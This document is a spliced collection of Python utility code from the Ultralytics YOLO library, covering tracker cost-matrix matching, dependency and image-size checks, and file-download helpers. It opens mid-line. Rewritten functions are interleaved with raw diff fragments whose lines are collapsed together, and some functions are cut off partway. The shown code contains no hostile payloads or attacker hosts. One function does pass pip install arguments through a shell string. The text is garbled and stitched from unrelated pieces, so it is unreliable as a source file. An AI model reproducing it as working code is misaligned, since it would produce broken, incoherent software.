self.r_s.contains(self.Point(self.track_line[-1])): + 
def linear_assignment(cost_matrix: np.ndarray, thresh: float, use_lap: bool = True) -> tuple:
    """
    Perform linear assignment using either the scipy or lap.lapjv method.

    Args:
        cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M).
        thresh (float): Threshold for considering an assignment valid.
        use_lap (bool): Use lap.lapjv for the assignment. If False, scipy.optimize.linear_sum_assignment is used.

    Returns:
        matched_indices (np.ndarray | list): Matched (row, column) index pairs, K pairs of 2 indices each. The
            scipy path always returns an array of shape (K, 2), including K == 0.
        unmatched_a (np.ndarray | tuple): Unmatched row indices (first set) in ascending order.
        unmatched_b (np.ndarray | tuple): Unmatched column indices (second set) in ascending order.

    Examples:
        >>> cost_matrix = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
        >>> thresh = 5.0
        >>> matched_indices, unmatched_a, unmatched_b = linear_assignment(cost_matrix, thresh, use_lap=True)
    """
    if cost_matrix.size == 0:
        return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1]))

    if use_lap:
        # Use lap.lapjv
        # https://github.com/gatagat/lap
        _, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)
        matches = [[ix, mx] for ix, mx in enumerate(x) if mx >= 0]
        unmatched_a = np.where(x < 0)[0]
        unmatched_b = np.where(y < 0)[0]
    else:
        # Use scipy.optimize.linear_sum_assignment
        # https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.linear_sum_assignment.html
        # Imported explicitly: a bare `import scipy` does not guarantee the `optimize` submodule is loaded.
        from scipy.optimize import linear_sum_assignment

        rows, cols = linear_sum_assignment(cost_matrix)  # row indices, column indices
        keep = cost_matrix[rows, cols] <= thresh  # discard assignments that cost more than the threshold
        matches = np.stack([rows[keep], cols[keep]], axis=1)  # shape (K, 2), also when K == 0
        # Sorted index arrays, matching the array type returned by the lap branch
        unmatched_a = np.setdiff1d(np.arange(cost_matrix.shape[0]), matches[:, 0])
        unmatched_b = np.setdiff1d(np.arange(cost_matrix.shape[1]), matches[:, 1])

    return matches, unmatched_a, unmatched_b
def embedding_distance(tracks: list, detections: list, metric: str = "cosine") -> np.ndarray:
    """
    Build the pairwise appearance-distance cost matrix between tracks and detections.

    Each track contributes its `smooth_feat` vector and each detection its `curr_feat` vector; distances are
    computed with `scipy.spatial.distance.cdist` and clamped to be non-negative.

    Args:
        tracks (list[STrack]): List of tracks, where each track contains embedding features.
        detections (list[BaseTrack]): List of detections, where each detection contains embedding features.
        metric (str): Metric for distance computation. Supported metrics include 'cosine', 'euclidean', etc.

    Returns:
        (np.ndarray): Cost matrix computed based on embeddings with shape (N, M), where N is the number of tracks
            and M is the number of detections. An all-zero float32 matrix is returned when N or M is 0.

    Examples:
        Compute the embedding distance between tracks and detections using cosine metric
        >>> tracks = [STrack(...), STrack(...)]  # List of track objects with embedding features
        >>> detections = [BaseTrack(...), BaseTrack(...)]  # List of detection objects with embedding features
        >>> cost_matrix = embedding_distance(tracks, detections, metric="cosine")
    """
    num_tracks, num_dets = len(tracks), len(detections)
    if num_tracks == 0 or num_dets == 0:
        # Nothing to compare: hand back the empty (N, M) matrix
        return np.zeros((num_tracks, num_dets), dtype=np.float32)

    det_feats = np.asarray([det.curr_feat for det in detections], dtype=np.float32)
    track_feats = np.asarray([trk.smooth_feat for trk in tracks], dtype=np.float32)
    distances = cdist(track_feats, det_feats, metric)  # Normalized features
    return np.maximum(0.0, distances)
+ + Examples: + Fuse a cost matrix with detection scores + >>> cost_matrix = np.random.rand(5, 10) # 5 tracks and 10 detections + >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)] + >>> fused_matrix = fuse_score(cost_matrix, detections) + """ + if cost_matrix.size == 0: + return cost_matrix + iou_sim = 1 - cost_matrix + det_scores = np.array([det.score for det in detections]) + det_scores = np.expand_dims(det_scores, axis=0).repeat(cost_matrix.shape[0], axis=0) + fuse_sim = iou_sim * det_scores + return 1 - fuse_sim # fuse_cost diff --git a/2024.ultralytics/v8.3.46/utils/checks.py b/2024.ultralytics/v8.3.46/utils/checks.py new file mode 100644 index 0000000..fe858eb --- /dev/null +++ b/2024.ultralytics/v8.3.46/utils/checks.py @@ -0,0 +1,789 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import glob +import inspect +import math +import os +import platform +import re +import shutil +import subprocess +import time +from importlib import metadata +from pathlib import Path +from typing import Optional + +import cv2 +import numpy as np +import requests +import torch + +from ultralytics.utils import ( + ASSETS, + AUTOINSTALL, + IS_COLAB, + IS_GIT_DIR, + IS_KAGGLE, + IS_PIP_PACKAGE, + LINUX, + LOGGER, + MACOS, + ONLINE, + PYTHON_VERSION, + ROOT, + TORCHVISION_VERSION, + USER_CONFIG_DIR, + WINDOWS, + Retry, + SimpleNamespace, + ThreadingLocked, + TryExcept, + clean_url, + colorstr, + downloads, + emojis, + is_github_action_running, + url2file, +) + + +def parse_requirements(file_path=ROOT.parent / "requirements.txt", package=""): + """ + Parse a requirements.txt file, ignoring lines that start with '#' and any text after '#'. + + Args: + file_path (Path): Path to the requirements.txt file. + package (str, optional): Python package to use instead of requirements.txt file, i.e. package='ultralytics'. + + Returns: + (List[Dict[str, str]]): List of parsed requirements as dictionaries with `name` and `specifier` keys. 
def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0):
    """
    Verify image size is a multiple of the given stride in each dimension. If the image size is not a multiple of the
    stride, update it to the nearest multiple of the stride that is greater than or equal to the given floor value.

    Args:
        imgsz (int | List[int] | Tuple[int] | str): Image size. A string may be a plain number ('640') or a
            Python literal list/tuple ('[640,640]', '640,480').
        stride (int | torch.Tensor): Stride value. For a tensor, its maximum element is used.
        min_dim (int): Minimum number of dimensions.
        max_dim (int): Maximum number of dimensions.
        floor (int): Minimum allowed value for image size.

    Returns:
        (List[int] | int): Updated image size. A single int is returned when `min_dim == 1` and only one
            dimension was given; a one-element size is duplicated to `[s, s]` when `min_dim == 2`.

    Raises:
        TypeError: If `imgsz` is not an int, list, tuple or str.
        ValueError: If a string `imgsz` is not a valid literal, or if `imgsz` has more than `max_dim` values
            while `max_dim != 1`.
    """
    import ast  # local import; only needed to parse string sizes

    # Convert stride to integer if it is a tensor
    stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride)

    # Convert image size to list if it is an integer
    if isinstance(imgsz, int):
        imgsz = [imgsz]
    elif isinstance(imgsz, (list, tuple)):
        imgsz = list(imgsz)
    elif isinstance(imgsz, str):  # i.e. '640' or '[640,640]'
        if imgsz.isnumeric():
            imgsz = [int(imgsz)]
        else:
            # literal_eval only accepts Python literals, so an arbitrary expression in a CLI/config string is
            # rejected instead of being executed.
            try:
                parsed = ast.literal_eval(imgsz)
            except (ValueError, SyntaxError) as e:
                raise ValueError(
                    f"'imgsz={imgsz}' is not a valid image size string. "
                    f"Valid imgsz strings are i.e. 'imgsz=640' or 'imgsz=[640,640]'"
                ) from e
            # Normalise to a list so the comparison with the stride-aligned list below is like-for-like
            imgsz = list(parsed) if isinstance(parsed, (list, tuple)) else [parsed]
    else:
        raise TypeError(
            f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. "
            f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'"
        )

    # Apply max_dim
    if len(imgsz) > max_dim:
        msg = (
            "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list "
            "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'"
        )
        if max_dim != 1:
            raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}")
        LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}")
        imgsz = [max(imgsz)]
    # Make image size a multiple of the stride
    sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz]

    # Print warning message if image size was updated
    if sz != imgsz:
        LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}")

    # Add missing dimensions if necessary
    sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz

    return sz
+ + Example: + ```python + # Check if current version is exactly 22.04 + check_version(current="22.04", required="==22.04") + + # Check if current version is greater than or equal to 22.04 + check_version(current="22.10", required="22.04") # assumes '>=' inequality if none passed + + # Check if current version is less than or equal to 22.04 + check_version(current="22.04", required="<=22.04") + + # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive) + check_version(current="21.10", required=">20.04,<22.04") + ``` + """ + if not current: # if current is '' or None + LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.") + return True + elif not current[0].isdigit(): # current is package name rather than version string, i.e. current='ultralytics' + try: + name = current # assigned package name to 'name' arg + current = metadata.version(current) # get version string from package name + except metadata.PackageNotFoundError as e: + if hard: + raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e + else: + return False + + if not required: # if required is '' or None + return True + + if "sys_platform" in required and ( # i.e. 
def check_latest_pypi_version(package_name="ultralytics"):
    """
    Look up the newest released version of a package from the PyPI JSON API without downloading or installing it.

    Args:
        package_name (str): The name of the package to find the latest version for.

    Returns:
        (str | None): The latest version of the package, or None when the response status is not 200 or any
            exception is raised during the lookup.
    """
    try:
        requests.packages.urllib3.disable_warnings()  # Disable the InsecureRequestWarning
        reply = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3)
        if reply.status_code != 200:
            return None
        return reply.json()["info"]["version"]
    except Exception:
        # Best-effort lookup: any failure is reported as "unknown" rather than raised
        return None
@ThreadingLocked()
def check_font(font="Arial.ttf"):
    """
    Locate a font file, downloading it into the user configuration directory when it is not available locally.

    The lookup order is: USER_CONFIG_DIR, then the system fonts reported by matplotlib, then the Ultralytics assets
    release on GitHub.

    Args:
        font (str): Path or name of font.

    Returns:
        (Path | str | None): Path inside USER_CONFIG_DIR when the font is cached or was just downloaded, the matching
            system font path string when one is found, or None when the download URL is not reachable.
    """
    from matplotlib import font_manager

    # 1. Previously downloaded copy in USER_CONFIG_DIR
    font_name = Path(font).name
    cached = USER_CONFIG_DIR / font_name
    if cached.exists():
        return cached

    # 2. Fonts installed on the system whose path contains the requested name
    system_hits = [candidate for candidate in font_manager.findSystemFonts() if font in candidate]
    if any(system_hits):
        return system_hits[0]

    # 3. Download to USER_CONFIG_DIR if missing
    url = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{font_name}"
    if not downloads.is_url(url, check=True):
        return None
    downloads.safe_download(url=url, file=cached)
    return cached
@TryExcept()
def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""):
    """
    Check if installed dependencies meet YOLOv8 requirements and attempt to auto-update if needed.

    Args:
        requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a
            string, or a list of package requirements as strings.
        exclude (Tuple[str]): Tuple of package names to exclude from checking.
        install (bool): If True, attempt to auto-update packages that don't meet requirements.
        cmds (str): Additional commands to pass to the pip install command when auto-updating.

    Returns:
        (bool): True when every requirement is satisfied or the auto-update succeeded, False when requirements are
            unmet and installation is disabled or failed.

    Raises:
        AssertionError: If `requirements` is a Path that does not exist.

    Example:
        ```python
        from ultralytics.utils.checks import check_requirements

        # Check a requirements.txt file
        check_requirements("path/to/requirements.txt")

        # Check a single package
        check_requirements("ultralytics>=8.0.0")

        # Check multiple packages
        check_requirements(["numpy", "ultralytics>=8.0.0"])
        ```
    """
    prefix = colorstr("red", "bold", "requirements:")
    if isinstance(requirements, Path):  # requirements.txt file
        file = requirements.resolve()
        if not file.exists():  # explicit raise instead of `assert` so the check is not stripped by `python -O`
            raise AssertionError(f"{prefix} {file} not found, check failed.")
        requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude]
    elif isinstance(requirements, str):
        requirements = [requirements]

    pkgs = []  # requirement strings that are missing or do not satisfy their version specifier
    for r in requirements:
        r_stripped = r.split("/")[-1].replace(".git", "")  # replace git+https://org/repo.git -> 'repo'
        match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", r_stripped)
        name, required = match[1], match[2].strip() if match[2] else ""
        try:
            satisfied = check_version(metadata.version(name), required)
        except (AssertionError, metadata.PackageNotFoundError):
            satisfied = False  # package not installed (or version lookup failed its own checks)
        if not satisfied:
            pkgs.append(r)

    @Retry(times=2, delay=1)
    def attempt_install(packages, commands):
        """Attempt pip install command with retries on failure."""
        # NOTE(review): the command is assembled as a shell string; requirement strings are presumably trusted
        return subprocess.check_output(f"pip install --no-cache-dir {packages} {commands}", shell=True).decode()

    s = " ".join(f'"{x}"' for x in pkgs)  # console string
    if s:
        if install and AUTOINSTALL:  # check environment variable
            n = len(pkgs)  # number of packages updates
            LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...")
            try:
                t = time.time()
                if not ONLINE:  # explicit raise so the offline guard also holds under `python -O`
                    raise AssertionError("AutoUpdate skipped (offline)")
                LOGGER.info(attempt_install(s, cmds))
                dt = time.time() - t
                LOGGER.info(
                    f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n"
                    f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
                )
            except Exception as e:
                LOGGER.warning(f"{prefix} ❌ {e}")
                return False
        else:
            return False

    return True
def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""):
    """
    Check file(s) for acceptable suffix.

    Args:
        file (str | Path | list | tuple): A single filename or a list/tuple of filenames to validate. Falsy values
            skip the check.
        suffix (str | tuple | list): Acceptable suffix or collection of suffixes, i.e. '.pt' or ('.yaml', '.yml').
            Falsy values skip the check.
        msg (str): Text prepended to the error message.

    Raises:
        AssertionError: If a file has a non-empty suffix that is not among the acceptable ones. Files without any
            suffix are accepted.
    """
    if not (file and suffix):
        return
    if isinstance(suffix, str):
        suffix = (suffix,)
    for f in file if isinstance(file, (list, tuple)) else [file]:
        s = Path(f).suffix.lower().strip()  # file suffix
        # Raise explicitly rather than via `assert`, which is removed when Python runs with -O
        if s and s not in suffix:
            raise AssertionError(f"{msg}{f} acceptable suffix is {suffix}, not {s}")
def check_model_file_from_stem(model="yolov8n"):
    """
    Return a model filename from a valid model stem.

    Args:
        model (str | Path): Model name, with or without a file suffix.

    Returns:
        (Path | str): `model` with a '.pt' suffix appended when it has no suffix and its stem is listed in
            downloads.GITHUB_ASSETS_STEMS; otherwise `model` is returned unchanged.
    """
    if not model:
        return model  # nothing to resolve
    candidate = Path(model)
    if candidate.suffix:
        return model  # already carries a suffix
    if candidate.stem not in downloads.GITHUB_ASSETS_STEMS:
        return model  # not a known asset stem
    return candidate.with_suffix(".pt")  # add suffix, i.e. yolov8n -> yolov8n.pt
def check_is_path_safe(basedir, path):
    """
    Tell whether a path, once resolved, exists and lies under the intended directory (path traversal guard).

    Args:
        basedir (Path | str): The intended directory.
        path (Path | str): The path to check.

    Returns:
        (bool): True if the resolved path exists and its leading components equal those of the resolved base
            directory, False otherwise.
    """
    root_parts = Path(basedir).resolve().parts
    target = Path(path).resolve()
    if not target.exists():
        return False
    # Compare component-wise so that '/data2/x' is not mistaken for a child of '/data'
    return target.parts[: len(root_parts)] == root_parts
def collect_system_info():
    """
    Collect and log relevant system information including OS, Python, RAM, CPU, CUDA and package versions.

    Returns:
        (dict): The logged values keyed by label, plus a "Package Info" entry mapping each ultralytics requirement to
            its status string, and a "GitHub Info" entry when running inside a GitHub Actions workflow.
    """
    import psutil

    from ultralytics.utils import ENVIRONMENT  # scope to avoid circular import
    from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info

    gib = 1 << 30  # bytes per GiB
    cuda = torch and torch.cuda.is_available()
    check_yolo()
    total, used, free = shutil.disk_usage("/")

    info_dict = {
        "OS": platform.platform(),
        "Environment": ENVIRONMENT,
        "Python": PYTHON_VERSION,
        "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other",
        "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB",
        "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB",
        "CPU": get_cpu_info(),
        "CPU count": os.cpu_count(),
        "GPU": get_gpu_info(index=0) if cuda else None,
        "GPU count": torch.cuda.device_count() if cuda else None,
        "CUDA": torch.version.cuda if cuda else None,
    }
    LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n")

    package_info = {}
    for r in parse_requirements(package="ultralytics"):
        try:
            current = metadata.version(r.name)
            # hard=False: an unmet version must be reported as ❌, not raised as ModuleNotFoundError mid-report
            is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=False) else "❌ "
        except metadata.PackageNotFoundError:
            current = "(not installed)"
            is_met = "❌ "
        package_info[r.name] = f"{is_met}{current}{r.specifier}"
        LOGGER.info(f"{r.name:<20}{package_info[r.name]}")

    info_dict["Package Info"] = package_info

    if is_github_action_running():
        github_info = {
            "RUNNER_OS": os.getenv("RUNNER_OS"),
            "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"),
            "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"),
            "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"),
            "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"),
            "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"),
        }
        LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items()))
        info_dict["GitHub Info"] = github_info

    return info_dict
def git_describe(path=ROOT):  # path must be a directory
    """
    Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe.

    Args:
        path (Path | str): Directory inside the git repository to describe.

    Returns:
        (str): Output of `git describe --tags --long --always` for `path`, or an empty string when the command
            cannot be run or fails (git missing, not a repository, ...).
    """
    # Pass an argument list and no shell, so paths containing spaces or shell metacharacters are handled verbatim
    cmd = ["git", "-C", str(path), "describe", "--tags", "--long", "--always"]
    try:
        return subprocess.check_output(cmd).decode().strip()
    except Exception:
        return ""
def cuda_device_count() -> int:
    """
    Get the number of NVIDIA GPUs available in the environment.

    The count is read from the first line printed by `nvidia-smi --query-gpu=count`.

    Returns:
        (int): The number of NVIDIA GPUs available, or 0 when nvidia-smi is missing, exits with an error, or prints
            something that is not an integer.
    """
    query = ["nvidia-smi", "--query-gpu=count", "--format=csv,noheader,nounits"]
    try:
        report = subprocess.check_output(query, encoding="utf-8")
        return int(report.strip().split("\n")[0])  # only the first reported line is used
    except (subprocess.CalledProcessError, FileNotFoundError, ValueError):
        return 0  # assume no GPUs are available
def is_url(url, check=False):
    """
    Validates if the given string is a URL and optionally checks if the URL exists online.

    Args:
        url (str): The string to be validated as a URL.
        check (bool, optional): If True, performs an additional check to see if the URL exists online.
            Defaults to False.

    Returns:
        (bool): Returns True for a valid URL (one with both a scheme and a network location). If 'check' is True,
            returns True only if opening the URL also yields status code 200. Returns False otherwise, including when
            any exception is raised.

    Example:
        ```python
        valid = is_url("https://www.example.com")
        ```
    """
    try:
        url = str(url)
        result = parse.urlparse(url)
        # Explicit test instead of `assert`: under `python -O` an assert is removed and every string would pass
        if not (result.scheme and result.netloc):
            return False
        if check:
            with request.urlopen(url) as response:
                return response.getcode() == 200  # check if exists online
        return True
    except Exception:
        return False
def zip_directory(directory, compress=True, exclude=(".DS_Store", "__MACOSX"), progress=True):
    """
    Create a zip archive of a directory next to it, skipping files whose name contains an excluded string.

    The archive is named after the directory (same parent, '.zip' suffix) and stores paths relative to the directory.
    Before zipping, delete_dsstore() is run on the directory.

    Args:
        directory (str | Path): The path to the directory to be zipped.
        compress (bool): Whether to compress the files while zipping. Default is True.
        exclude (tuple, optional): A tuple of filename strings to be excluded. Defaults to ('.DS_Store', '__MACOSX').
        progress (bool, optional): Whether to display a progress bar. Defaults to True.

    Returns:
        (Path): The path to the resulting zip file.

    Raises:
        FileNotFoundError: If `directory` is not an existing directory.

    Example:
        ```python
        from ultralytics.utils.downloads import zip_directory

        file = zip_directory("path/to/dir")
        ```
    """
    from zipfile import ZIP_DEFLATED, ZIP_STORED, ZipFile

    delete_dsstore(directory)
    directory = Path(directory)
    if not directory.is_dir():
        raise FileNotFoundError(f"Directory '{directory}' does not exist.")

    # Collect the regular files to archive; the exclusion test looks at the file name only
    selected = []
    for candidate in directory.rglob("*"):
        if candidate.is_file() and not any(token in candidate.name for token in exclude):
            selected.append(candidate)

    # Zip with progress bar
    zip_file = directory.with_suffix(".zip")
    mode = ZIP_DEFLATED if compress else ZIP_STORED
    with ZipFile(zip_file, "w", mode) as archive:
        bar = TQDM(selected, desc=f"Zipping {directory} to {zip_file}...", unit="file", disable=not progress)
        for member in bar:
            archive.write(member, member.relative_to(directory))

    return zip_file  # return path to zip file
def check_disk_space(url="https://ultralytics.com/assets/coco8.zip", path=Path.cwd(), sf=1.5, hard=True):
    """
    Check if there is sufficient disk space to download and store a file.

    The file size is taken from the Content-Length header of a HEAD request; a missing header counts as size 0.

    Args:
        url (str, optional): The URL to the file. Defaults to 'https://ultralytics.com/assets/coco8.zip'.
        path (str | Path, optional): The path or drive to check the available free space on.
        sf (float, optional): Safety factor, the multiplier for the required free space. Defaults to 1.5.
        hard (bool, optional): Whether to throw an error or not on insufficient disk space. Defaults to True.

    Returns:
        (bool): True if there is sufficient disk space or the size could not be determined, False otherwise.

    Raises:
        MemoryError: If free space is insufficient and `hard` is True.
    """
    try:
        # Follow redirects: requests.head() does not by default, and a 3xx reply would pass the status check below
        # while carrying the Content-Length of the redirect response instead of the file
        r = requests.head(url, allow_redirects=True)  # response
    except Exception:
        return True  # requests issue, default to True
    if r.status_code >= 400:
        return True  # URL error, size unknown, default to True

    # Check file size
    gib = 1 << 30  # bytes per GiB
    try:
        data = int(r.headers.get("Content-Length", 0)) / gib  # file size (GiB)
    except Exception:
        return True  # unusable Content-Length, default to True
    total, used, free = (x / gib for x in shutil.disk_usage(path))  # bytes converted to GiB

    if data * sf < free:
        return True  # sufficient space

    # Insufficient space
    text = (
        f"WARNING ⚠️ Insufficient free disk space {free:.1f} GB < {data * sf:.3f} GB required, "
        f"Please free {data * sf - free:.1f} GB additional disk space and try again."
    )
    if hard:
        raise MemoryError(text)
    LOGGER.warning(text)
    return False
def safe_download(
    url,
    file=None,
    dir=None,
    unzip=True,
    delete=False,
    curl=False,
    retry=3,
    min_bytes=1e0,
    exist_ok=False,
    progress=True,
):
    """
    Downloads files from a URL, with options for retrying, unzipping, and deleting the downloaded file.

    Args:
        url (str): The URL of the file to be downloaded.
        file (str, optional): The filename of the downloaded file.
            If not provided, the file will be saved with the same name as the URL.
        dir (str | Path, optional): The directory to save the downloaded file.
            If not provided, the file will be saved in the current working directory.
        unzip (bool, optional): Whether to unzip the downloaded file. Default: True.
        delete (bool, optional): Whether to delete the downloaded file after unzipping. Default: False.
        curl (bool, optional): Whether to use curl command line tool for downloading. Default: False.
        retry (int, optional): The number of times to retry the download in case of failure. Default: 3.
        min_bytes (float, optional): The minimum number of bytes that the downloaded file should have, to be considered
            a successful download. Default: 1E0.
        exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False.
        progress (bool, optional): Whether to display a progress bar during the download. Default: True.

    Returns:
        (Path | None): The extraction directory when the file has an archive-like suffix ('', '.zip', '.tar', '.gz')
            and `unzip` is True; otherwise None.

    Raises:
        ConnectionError: If the download fails while offline on the first attempt, or the retry limit is reached.

    Example:
        ```python
        from ultralytics.utils.downloads import safe_download

        link = "https://ultralytics.com/assets/bus.jpg"
        path = safe_download(link)
        ```
    """
    gdrive = url.startswith("https://drive.google.com/")  # check if the URL is a Google Drive link
    if gdrive:
        url, file = get_google_drive_file_info(url)

    f = Path(dir or ".") / (file or url2file(url))  # URL converted to filename
    if "://" not in str(url) and Path(url).is_file():  # URL exists ('://' check required in Windows Python<3.10)
        f = Path(url)  # filename
    elif not f.is_file():  # URL and file do not exist
        uri = (url if gdrive else clean_url(url)).replace(  # cleaned and aliased url
            "https://github.com/ultralytics/assets/releases/download/v0.0.0/",
            "https://ultralytics.com/assets/",  # assets alias
        )
        desc = f"Downloading {uri} to '{f}'"
        LOGGER.info(f"{desc}...")
        f.parent.mkdir(parents=True, exist_ok=True)  # make directory if missing
        check_disk_space(url, path=f.parent)
        for i in range(retry + 1):
            try:
                if curl or i > 0:  # curl download with retry, continue
                    s = "sS" * (not progress)  # silent
                    r = subprocess.run(["curl", "-#", f"-{s}L", url, "-o", f, "--retry", "3", "-C", "-"]).returncode
                    assert r == 0, f"Curl return value {r}"
                else:  # urllib download
                    method = "torch"
                    if method == "torch":
                        torch.hub.download_url_to_file(url, f, progress=progress)
                    else:
                        with request.urlopen(url) as response, TQDM(
                            total=int(response.getheader("Content-Length", 0)),
                            desc=desc,
                            disable=not progress,
                            unit="B",
                            unit_scale=True,
                            unit_divisor=1024,
                        ) as pbar:
                            with open(f, "wb") as f_opened:
                                for data in response:
                                    f_opened.write(data)
                                    pbar.update(len(data))

                if f.exists():
                    if f.stat().st_size > min_bytes:
                        break  # success
                    f.unlink()  # remove partial downloads
            except Exception as e:
                if i == 0 and not is_online():
                    raise ConnectionError(emojis(f"❌ Download failure for {uri}. Environment is not online.")) from e
                elif i >= retry:
                    raise ConnectionError(emojis(f"❌ Download failure for {uri}. Retry limit reached.")) from e
                LOGGER.warning(f"⚠️ Download failure, retrying {i + 1}/{retry} {uri}...")

    if unzip and f.exists() and f.suffix in {"", ".zip", ".tar", ".gz"}:
        from zipfile import is_zipfile

        # Wrap in Path so a string `dir` (allowed by the signature) does not fail on .resolve()
        unzip_dir = Path(dir or f.parent).resolve()  # unzip to dir if provided else unzip in place
        if is_zipfile(f):
            unzip_dir = unzip_file(file=f, path=unzip_dir, exist_ok=exist_ok, progress=progress)  # unzip
        elif f.suffix in {".tar", ".gz"}:
            LOGGER.info(f"Unzipping {f} to {unzip_dir}...")
            subprocess.run(["tar", "xf" if f.suffix == ".tar" else "xfz", f, "--directory", unzip_dir], check=True)
        if delete:
            f.unlink()  # remove zip
        return unzip_dir
tags/v6.2 + url = f"https://api.github.com/repos/{repo}/releases/{version}" + r = requests.get(url) # github api + if r.status_code != 200 and r.reason != "rate limit exceeded" and retry: # failed and not 403 rate limit exceeded + r = requests.get(url) # try again + if r.status_code != 200: + LOGGER.warning(f"⚠️ GitHub assets check failure for {url}: {r.status_code} {r.reason}") + return "", [] + data = r.json() + return data["tag_name"], [x["name"] for x in data["assets"]] # tag, assets i.e. ['yolov8n.pt', 'yolov8s.pt', ...] + + +def attempt_download_asset(file, repo="ultralytics/assets", release="v8.3.0", **kwargs): + """ + Attempt to download a file from GitHub release assets if it is not found locally. The function checks for the file + locally first, then tries to download it from the specified GitHub repository release. + + Args: + file (str | Path): The filename or file path to be downloaded. + repo (str, optional): The GitHub repository in the format 'owner/repo'. Defaults to 'ultralytics/assets'. + release (str, optional): The specific release version to be downloaded. Defaults to 'v8.3.0'. + **kwargs (any): Additional keyword arguments for the download process. + + Returns: + (str): The path to the downloaded file. + + Example: + ```python + file_path = attempt_download_asset("yolo11n.pt", repo="ultralytics/assets", release="latest") + ``` + """ + from ultralytics.utils import SETTINGS # scoped for circular import + + # YOLOv3/5u updates + file = str(file) + file = checks.check_yolov5u_filename(file) + file = Path(file.strip().replace("'", "")) + if file.exists(): + return str(file) + elif (SETTINGS["weights_dir"] / file).exists(): + return str(SETTINGS["weights_dir"] / file) + else: + # URL specified + name = Path(parse.unquote(str(file))).name # decode '%2F' to '/' etc. 
+ download_url = f"https://github.com/{repo}/releases/download" + if str(file).startswith(("http:/", "https:/")): # download + url = str(file).replace(":/", "://") # Pathlib turns :// -> :/ + file = url2file(name) # parse authentication https://url.com/file.txt?auth... + if Path(file).is_file(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + safe_download(url=url, file=file, min_bytes=1e5, **kwargs) + + elif repo == GITHUB_ASSETS_REPO and name in GITHUB_ASSETS_NAMES: + safe_download(url=f"{download_url}/{release}/{name}", file=file, min_bytes=1e5, **kwargs) + + else: + tag, assets = get_github_assets(repo, release) + if not assets: + tag, assets = get_github_assets(repo) # latest release + if name in assets: + safe_download(url=f"{download_url}/{tag}/{name}", file=file, min_bytes=1e5, **kwargs) + + return str(file) + + +def download(url, dir=Path.cwd(), unzip=True, delete=False, curl=False, threads=1, retry=3, exist_ok=False): + """ + Downloads files from specified URLs to a given directory. Supports concurrent downloads if multiple threads are + specified. + + Args: + url (str | list): The URL or list of URLs of the files to be downloaded. + dir (Path, optional): The directory where the files will be saved. Defaults to the current working directory. + unzip (bool, optional): Flag to unzip the files after downloading. Defaults to True. + delete (bool, optional): Flag to delete the zip files after extraction. Defaults to False. + curl (bool, optional): Flag to use curl for downloading. Defaults to False. + threads (int, optional): Number of threads to use for concurrent downloads. Defaults to 1. + retry (int, optional): Number of retries in case of download failure. Defaults to 3. + exist_ok (bool, optional): Whether to overwrite existing contents during unzipping. Defaults to False. 
